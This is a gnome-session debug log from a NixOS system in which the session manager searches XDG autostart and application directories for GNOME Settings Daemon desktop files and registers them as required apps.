machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App14 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Sound.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.UsbProtection.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App15 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.UsbProtection.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Wacom.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App16 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Wacom.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.XSettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
